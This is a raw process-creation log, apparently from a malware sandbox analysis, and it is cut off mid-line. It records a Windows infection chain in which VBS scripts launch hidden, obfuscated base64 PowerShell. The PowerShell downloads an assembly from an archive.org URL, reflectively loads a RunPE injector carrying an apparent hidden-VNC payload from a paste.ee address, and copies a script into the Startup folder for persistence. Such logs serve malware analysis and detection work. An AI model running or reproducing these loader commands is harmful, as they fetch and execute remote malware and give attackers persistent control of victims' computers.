Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 